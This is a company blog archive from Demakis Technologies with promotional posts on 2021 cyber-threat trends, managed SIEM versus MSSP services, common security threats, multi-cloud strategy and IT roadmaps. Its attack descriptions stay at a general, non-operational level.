• Welcome to Demakis Technologies! We are waiting to help you!

Monthly Archives: December 2020

Five Emerging Cyber-Threats to Watch Out for in 2021

Five Emerging Cyber-Threats to Watch Out for in 2021

What was the driving force behind your company’s digital strategy in 2020?

Was it your CEO? Probably not. Your CTO or CISO? Perhaps. 

In reality, for most organizations, it was COVID-19. In 2019, one company after another said: “work-from-home isn’t an option for us” or “we aren’t interested in shifting operations to the cloud.” 

Then everything changed. The pandemic drove a massive shift towards remote work. For many companies, this wasn’t even an option — it was a case of ‘do or die.’ 

By April 2020, almost half of the American workforce was working from home. As organizations and employees become more comfortable with this, we shouldn’t expect a full return to the traditional in-office model anytime soon, if ever. Work-from-anywhere is the new way of doing business, with employees accessing cloud services, collaborative tools and remote systems from home and public networks – and not always through the safety of a VPN. 

This rapid shift brings a host of security challenges for companies, and we think five trends will dominate the cybersecurity landscape in 2021. 

1. Yesterday’s Cyber-Threats, Evolved 

Cyber-Threats to Watch Out for in 2021

First off, it seems clear that ‘known’ cyber-threats such as phishing, ransomware, Trojans and botnets will remain prominent. Such attacks are increasingly automated and tailored with personal info, often mined from company websites and social networks. As trends towards automation increase, these sorts of hazards will keep growing in number and frequency. 

Current events can shape these cyber-threats as well. We saw a surge in phishing emails during the pandemic, taking advantage of victims’ unfamiliarity with remote work applications or purporting to contain details of much-needed stimulus checks. 

As malware and social engineering campaigns are industrialized, cyber-criminals can assess and fine-tune their attacks based on the results achieved until they have a truly dangerous threat with a considerable success rate. 

2. Fileless Attacks 

As the name suggests, fileless attacks – a subset of ‘living off the land’ (LotL) attacks, which exploit tools and features already present in the victim’s environment – don’t rely on file-based payloads, and generally don’t generate new files either. As a result, they have the potential to fly under the radar of many prevention and detection solutions. 

A typical fileless attack might start with an emailed link to a malicious website. Social engineering tricks on that site can launch system tools, such as PowerShell, which retrieve and execute additional payloads directly in system memory. Detecting malicious use of built-in system tools, as opposed to their many legitimate automation and scripting uses, is a real challenge for traditional defenses. 

Fileless attacks aren’t new, exactly. The use of system tools as backdoors has been around for decades, but owing to the tactic’s considerable success rate – and the fact that leveraging existing system processes can shorten malware development cycles – they’re rapidly trending upwards. Also, fileless attacks aren’t limited to individual organizations: we see attackers increasingly targeting service providers, abusing their infrastructure and management tools to compromise their clients. 

3. Cloud and Remote Service Attacks 

Cyber-Threats in 2021

The COVID-19 pandemic forced companies to quickly adopt new cloud services, remote access tools and collaboration apps. However, many organizations lacked IT experts with the relevant training to properly configure these solutions – not to mention lacking the time to properly vet available tools or the budget to work with proven vendors rather than gravitating towards free alternatives of questionable quality. 

Server applications, containers and cloud storage aren’t always well-protected, and are seen by cyber-criminals as prime targets with a large attack surface. Compromising one service may expose scores of organizations downstream – a variant of supply chain attack, which sidesteps organizational security by infiltrating higher levels in the supply network and deploying payloads through the tools you rely on and trust. Misconfiguration only raises the risk, exposing more services to attackers. Such scenarios will inevitably lead to data breaches. 

4. Business Process Compromises 

Sometimes, cyber-criminals identify vulnerabilities not in applications, but in the process flow of business operations. We’re seeing an increase in business process compromises, in which threat actors take advantage of systemic operational weaknesses for financial gain. 

Attacks on business processes demand considerable knowledge of the victims’ systems and operations. They often begin with a compromised system on the target network, through which cyber-criminals can observe the organization’s processes and gradually identify weak links. 

These attacks are often quite discrete, and impacted organizations may not detect them in a timely fashion – especially if the compromised process continues to work ‘as expected’ despite producing different results. As an example, attackers could siphon funds by compromising an automatic invoicing tool and changing the bank account number that’s populated into each future invoice. 

5. Customized Payloads 

Five Cyber-Threats to Watch Out for in 2021

As we’ve seen in the contrast between phishing and spear-phishing, targeted attacks, while requiring extra effort on the threat actors’ part, are considerably more effective at compromising systems and data. This approach is starting to get much more sophisticated. 

Cyber-criminals can discover a lot about your network from company websites, social media and, of course, by compromising individual systems on the network. Pervasive, dual-use tools like PowerShell and WMI allow attackers to learn more about the tools and services your company relies on without setting off red flags. Armed with knowledge of these tools and the vulnerabilities present in each, they can construct payloads specifically designed to bring down not just a network, but your network. 

Approaches for 2021 

As cyber-criminals continue to evolve their technologies and attack strategies, organizations must adjust their approaches to cybersecurity and data protection. System-level anti-virus software isn’t enough to combat modern cyber-threats. Nor is file backup alone enough to safeguard against digital disruption by malicious actors. 

Businesses need to protect all their workloads, data and applications across multiple domains, and that requires integrated solutions that automate the system monitoring, vulnerability assessments and endpoint protection required to stop emerging threats. 

Let’s face it: 2020 has been a challenging year for cybersecurity and IT pros. Most have successfully navigated the massive changes, but unless they start preparing for the next wave of threats, 2021 may be just as rocky.

If you’d like to learn more about cyber-threats and how to protect your business in upcoming year, contact us here at Demakis Technologies.

Cyber101 Managed SIEM vs. Managed Security Service Providers

Cyber101: Managed SIEM vs. Managed Security Service Providers

What is the difference between Managed SIEM and Managed Security Service Provider?

A reader recently asked “What’s the difference between a Managed SIEM Service and a Managed Security Service Provider?” . It’s a question that doesn’t get asked often enough, and the differences can range from “pretty big” to “insanely different.”  Let’s dive a bit deeper and see what sets these two types of services apart: 

Security Information and Event Management (SIEM) systems are designed to collect and analyze security and other logs from networking devices (like firewalls) as well as servers, appliances, VM’s and other infrastructure.  In many cases they can also report on whatever they find.  While a SIEM is an invaluable tool to have as part of your security protocols, they can be difficult to manage and require specialized training to use effectively. 

Managed SIEM vs. Managed Security Service Providers

A Managed SIEM Service (MSS) is a company that does what it says on the tin.  They coordinate the collection of logs into the SIEM and handle data integrity, storage, and reporting operations.  However, it’s important to note that how much of each of those a particular MSS does can vary wildly.  Some simply coordinate gathering the logs and managing the actual SIEM platform itself; reporting on the raw data but not giving insight into what it means.   

Others handle storage and data management, but expect that the customer has one or more employees who will run reports and keep an eye on what’s actually going on.  Still others may do analysis, but report on all anomalies they find – including those that aren’t actual threats.  If your organization has cybersecurity personnel on the payroll, this service can be added into your overall security program, but probably isn’t sufficient to be a security program on its own. 

Managed SIEM: Centralized or Individual?

Managed SIEM Service providers may manage a centralized SIEM for multiple customers, or may set up and manage individual SIEM platforms for each customer.  Both methods are valid, so long as proper multi-tenancy restrictions are put in place so that customer data does not mix; and typically both types of solution sets can get the MSS job done. 

MSSP Solutions That Stand Out

Managed Security Service Providers

A Managed Security Services Provider (MSSP) will do what an MSS does as part of their package of services, but most often goes beyond that by a good measure.  MSSP will analyze the data that the logs represent to look for anomalies that may or may not be threats.  They will then analyze those anomalies to determine if a threat exists, and what impact that threat could have on the customer’s data and systems.  MSSP also has established methodologies to notify the customer of actual threats, and typically will also provide remediation guidance to help fix whatever security issues led to that threat event. 

Added to this, the majority of MSSP’s offer extended services – either as part of the base service or as add-ons purchased as bundles or a-la-carte.  For example, MSSP’s offer endpoint protection (anti-malware, Data Loss Prevention systems, etc.), email protection to stop phishing attacks and email fraud, vulnerability scanning to identify potential security issues before they become actual security issues, etc.   

MSSP Keeps You Informed On Regular Basis

MSS Providers

Since the MSSP handles so many of the individual security concerns of a customer, they also routinely set up regular briefings or meetings to relay new information to the customer and gather information about changes (upcoming or already in-place) to infrastructure, applications, etc.  This allows the MSSP’s services to best suit the changing reality of the IT landscape as more core applications move to Software as a Service, new technologies for networking are brought into play, etc.  

All of these services go beyond what would be expected of an MSS provider because they involve more than just the SIEM and the reports a SIEM can produce.  They require analysts to differentiate between anomalies that are benign and threats that need to be addressed.  These analysts are also trained in determining how significant a threat is in order to advise remediation over time or immediately.   

MSSP is also maintaining threat intelligence services to know what threats are out there, which are seeing growth and which are the most dangerous, and which are most likely to impact their customers at any given point in time.  And, of course, systems that handle vulnerability scanning, email, and endpoint protection are totally outside the scope of a SIEM, and wouldn’t be expected of an MSS; but are standard offerings for an MSSP. 

Conclusion

In short, an MSSP will offer MSS as part of their overall service packages, but typically an MSSP will go far beyond just managing the SIEM for a customer.  Which is the best fit for you depends on what IT and Cybersecurity talent you have on staff, if they can be used 24/7, and what hardware and/or software you have or are willing to acquire and manage from a security perspective.  You also need to know if you have the skill-set and tools to go beyond what a SIEM can offer.  If any of those points aren’t already part of your organization, then an MSSP is the way to go as they can supplement your staff, work with your IT partners, typically offer 24/7 services, and bring all the tools and skills required with them.

If you are looking for best IT solutions for your company, be free to contact us at Demakis Technologies.

10 Uncommon Cybersecurity Threats that Need be Avoided

10 Uncommon Cybersecurity Threats that Need be Avoided

Threats Blooming in the Cyberworld

The Cyber World or the Internet is a vast place where the sharing of data has its pros and cons. We all know the pros as our lives are now much easier, thanks to the Internet. However, not many of us are aware of the external cyber threats that go hand in hand with data Cybersecurity Threats.  

There are certain common Cybersecurity Threats that we can avoid in order to achieve a secure and safe atmosphere for the growth of our business or any sort of activities that require shared knowledge and the transmission of data.  

Cybersecurity Threats that Need be Avoided

Cloud Jacking 

Cloud Jacking is one of the most prominent types of attacks in recent times where certain code injection is being done to hamper and modify or take control of sensitive information stored in the cloud, and this is a very dangerous kind of data security threat. 

The threat to IoT Devices 

IoT or Internet of Things is a rapidly growing industry, and it will grow to $1.1 trillion by 2026. Since this is a new technology, it is vulnerable to cyberthreats and not much has been developed, in terms of cybersecurity, in this field. 

Deepfake 

Deepfake is the manipulation of an existing image or video through the help of machine learning and artificial intelligence. And this is a major threat in terms of hampering the image of someone influential running an organization which will unfortunately, become a very common cyber threat to businesses. 

Mobile Malware 

As more and more people are moving from laptops to mobiles and tablets, mobile Malwares are being developed to specifically target mobile phone operating systems. And in the near future, it will be one of the external cyber threats to the cybersecurity of Mobile Devices. 

5G-to-Wi-Fi Security Vulnerabilities 

With 5G rolling out across expansive public areas like airports, shopping centers, and hotels, the voice and data information of users on their cellular-enabled devices gets communicated via Wi-Fi access points. While mobile devices possess built-in intelligence to silently and automatically switch between cellular and Wi-Fi networks. Security researchers have already identified a number of vulnerabilities in this handover process. It is very likely that new, critical 5G-to-Wi-Fi security vulnerabilities will be exposed in 2020, and hence the importance of managing cybersecurity threats like upgrading security protocols in public Wi-Fi is needed. 

Insider Cybersecurity Threats

10 Cybersecurity Threats that Need be Avoided

Insider Cybersecurity Threats not only involve malicious attacks, but also the negligent use of systems and data by employees. 

To protect against these threats, organizations need to quickly and accurately detect, investigate, and respond to issues that could be indicators of insider attacks and this underlines the impact of people on cybersecurity. 

Application Programming Interface (API) Vulnerabilities and Breaches 

Application programming interface (API) security readiness typically lags behind web app security across the majority of organizations today. Additionally, more than two-thirds of the organizations readily make APIs available to the public to allow external developers and partners to tap into their app ecosystems and software platforms. 

As the dependence on APIs increases, API-based breaches will become more prominent in 2020. This will trigger adverse impacts on high-profile apps in financial processes, messaging, peer-to-peer and social media. As more organizations continue to adopt APIs for their applications, API security will be exposed as the weakest link, which could lead to cloud-native threats and put user data and privacy at risk. 

Email Initiated Infections 

Email Initiated Infections occur when a user clicks on an email attachment or a link in an email, either in error or thinking they’re clicking on a legitimate link/attachment. The most sophisticated attacks are nicely formatted emails, looking like they’re from a legitimate source. Links in legitimate-looking emails contain an attractive and enticing link that either collects personal data, downloads malware or deploys a small “dropper” file that calls back to the command server for more instructions. If there is a layer of protection that stops this dropper from interacting with the server, downloading the malware, or completing the infection, the chances of the infection spreading become much more limited. 

User-Initiated Website Visit 

When a user visits a website and inadvertently downloads malware it infects their endpoint system. This may also have implications for the network to which the device is connected to. Sometimes even “safe sites” can be the conduit of malware-laced links. However, a clear majority of the time, this type of cyberattack is caused by an unprotected endpoint device visiting a known unsafe site. This can happen even on known safe sites in a variety of situations such as website hijacking or URL poisoning. And this is one of the most common cyber threats to a business. 

DDoS

Cybersecurity Threats to be Avoided

Distributed denial of service (DDoS) attacks leverages the power of hundreds or even thousands of infected computers with the intent of crashing websites or entire networks. These groups of infected computers are known as a botnet or bot network. Typically, the target is businesses, but personal computers can be used en masse to execute a DDoS cyberattack without the innocent individual even knowing it. And this is one of the most common cyber threats to a business. 

Conclusion

It is clear that growing businesses must make on-going cybersecurity training a priority for all employees while establishing a multi-layered security strategy because everyone should have a personal goal pertaining to cybersecurity to avoid digital threats. Proactively keeping employees safe online and using the latest threat intelligence to stop threats before and after they have entered the company network is more important than ever and we must always move towards developing modern technologies on how to mitigate common cyberattacks. 

If you’d like to learn more about Cybersecurity threat mitigation for your business, contact us here at Demakis Technologies!

Multi-Cloud Strategies And Ways To Counter Any Issues

Multi-Cloud Strategies And Ways To Counter Any Issues

What are some Cloud strategy elements? 

For the growth of any business company, IT systems need to work together with them to protect their data and keep other digital systems safe and sound. Cloud computing in IT systems nowadays is very important as it is on-demand and helps to protect data and storage as cloud storage and provides computing power without direct management by the user. Today, we’re going to learn about different topics related to cloud computing like cloud strategies, hybrid cloud, cloud threats, and cloud security.  

The Environment in a Cloud System  

Multi-Cloud Strategies

Cloud environment in cloud systems is used to reduce costs as it is different from the typical equipment purchase. In the normal cloud world, the IT equipment is always purchased ahead of time and is purchased by the organization’s capital budget, but in a cloud environment, the organization only needs to pay for the service. The cost of the equipment will be cut from the operational budget provided by the organization, which saves money.  

Magic Quadrant: Magic quadrant for cloud is a series of market research reports published by a firm called Gartner.  

Architecture in Cloud  

A multi-cloud architecture is an environment where business organizations can build a secure cloud atmosphere different from the normal cloud atmosphere.   

Multi-cloud and Cloud Strategy   

The main intent of the multi-cloud strategy is to use as many clouds as required to limit the use of one cloud from a single provider.  

The cloud strategies are an outline for enhancing the role of a cloud in an organization or company rather than moving everything to the cloud. Many organizations lack cloud strategies but it is projected that 70% of them will have these strategies in place by 2022.  

The key cloud strategy goals are: 

  1. To understand the availability implications 
  2. To understand the governance of your data  
  3. To understand the management impact  
  4. To understand the goals of the government  
  5. To check the number of clouds and understand them  

Digital Enterprise strategy  

Multi-Cloud Strategies Counter Any Issues

Enterprise cloud strategy is a digital model where business organizations can access virtualized IT resources from any public or private cloud service provider on a pay-per-use basis. The resources can consist of networking infrastructure, data storage, or servers. The enterprise cloud strategy helps business organizations with flexibility, reducing costs, and increasing network security.  One big enterprise cloud strategy example is Netflix which took almost 6 to 7 years to transform its applications and move to microservices.  

Hybrid Cloud vs. Multi-Cloud  

An organization with a multi-cloud solution always uses multiple public cloud services from different providers. The different clouds can be used to provide the best service to the company and also include the multi-use operational approach.  

Some of you may ask, “What is a hybrid multi-cloud?” and “how is it different from multi-cloud solutions”? Hybrid multi-cloud combines both public and private clouds to obtain the best service to the organization. The components of a hybrid multi-cloud always work together which is different from the multi-cloud model.  

Machine learning 

A multi-cloud is an environment where an organization uses more than one cloud service to deliver special information. A multi-cloud can easily access intelligent capabilities without advanced skills in artificial intelligence (AI). Cloud companies like AWS and Google cloud offer many options for machine learning multi-cloud that do not require the knowledge of AI nor a team for data scientists.  

The benefits of machine learning are: 

  1. The cloud pay-per-use method is very good for AI or machine workloads, as you can manage the speed and power of GPUs.  
  2. Many machine learning engines give the opportunity to write codes using python and TensorFlow libraries.  
  3. The cloud machine learning makes it easy for the organizations to work and explore machine learning as projects get piled up and the demand increases.  

Risks and threats in the cloud  

As cloud systems provide so much security and protection of data digitally, it also has multi-cloud threats that can harm the company any time. Some of the multi-cloud threats are:  

  • Workload freshness  
  • Monitoring multi-cloud  
  • Authentication  
  • Authorization 

Security patches in the cloud  

To counter any risks in digital cloud systems, multi-cloud security should also be provided with it. Some multi-cloud security measures that can be taken are:  

  • Your cloud environments should be under control  
  • Use API software developer Axway as a software to provide security  
  • Minimize reliability and redundancy  
  • Avoid vendor lock-in  

SaaS security information 

Multi-Cloud Strategies Counter Issues

The increasing demand for a software-as-a-service (SaaS) application in business organizations has led to the development of best service practices that help SaaS security to protect the property.  

To minimize risks the following are the SaaS security best practices:  

  • Implement SaaS security controls  
  • Keep up with the development of tech 
  • Balance risks and productivity 

Conclusion

Today we learned all about cloud systems including cloud strategies, hybrid multi-cloud, multi-cloud threats, and multi-cloud security.  

If you’d like more information on the best practices guide to Multi-Cloud, contact us here at Demakis Technologies! 

How Do The IT Roadmaps Help Plan Your Business?

How does the IT roadmap help plan your business?

Benefits of IT Roadmap

Today we are going to define IT roadmaps, provide an example of an roadmap, and discuss a typical roadmap of a company and the roadmap builder.

IT roadmap

A roadmap is a technological strategic plan used by businesses for IT-related initiatives in the organization. There are several types of roadmaps such as:

  • Enterprise roadmap
  • IT project roadmap
  • IT architecture roadmap
  • Engineering roadmap

Benefits of IT roadmap

IT Roadmaps Help Plan Your Business

Some benefits of having an roadmap are: 

It Makes your IT initiatives more strategic

Organizing and planning a roadmap will help you strategically plan and identify the items needed for your business, the items that you do not need, and the items you need to prioritize.

It Saves you money

Planning a roadmap will also save you money by eliminating tasks and systems that are costing the organization too much money.

It Keeps the organization running smoothly

When you have a strategy, your employees will know what critical things to do to not disrupt the smooth flow of the organization.

Roadmap of a company

IT Roadmaps Help Your Business

A business roadmap of a company is a plan on how and where your company is heading and how to get it there. It depicts in the bigger picture for your business. It defines your company goals and objectives and illustrates the strategies for achieving growth. The roadmap of a company must therefore include its goals and objectives and by which means to achieve them. It is typically the same as the roadmap of a business where growth is the main factor.

Roadmap builder

An roadmap builder is a visual summary of your goals and objectives, and how you are going to achieve them.

Making changes to your company’s technological environment can be a difficult task, but can be achieved by simply following these steps:

Identify your objectives

Before you plan your roadmap, you need to identify what you want to achieve. You should visualize your goals and then proceed to the next step. You need to know how your specific strategy will change or benefit the business.

Determine your audience

Be aware of the audience you want to create the roadmap for. This can help create the roadmap in such a way that your targeted audience understands every bit of it.

Establish major themes

After deciding upon what you want to achieve, it is time to turn those goals into plans. Start planning on the highest levels and then plan its minute details.

Share your roadmap with relevant people

When your roadmap is ready, call a meeting and share it with your stakeholders. During this time tell them about the changes to be made and how it is going to evolve the business. 

Start assigning responsibilities

Once the plan is ready to use, turn those plans into tasks.

Review the roadmap with your team and determine which projects to work on first and in which order. Assign the tasks to your team and estimate their completion time.

This is how you build an roadmap.

Visual roadmap

The IT Roadmaps Help Your Business

A visual roadmap is a digital or printable format of your entire plan for presentation purposes. It graphically delineates every goal and objective and how to achieve them step by step.

What is technical planning?

Technical Planning is a process that provides a framework to define the amount of technical effort required to develop, deploy, and sustain the system.

IT infrastructure services

Information technology infrastructure can be defined as a set of IT components that are the foundation of any IT services. Many companies provide such services according to your needs.

Conclusion

Today we discussed IT roadmaps, roadmap examples, and the roadmap of a company. We also discussed the benefits of a roadmap and how to create one.  Here at Demakis Technologies, we strongly recommend preparing a roadmap for your business to achieve your targets.  If you’re interested in improving the efficiency and cost-savings of your business, give us a call!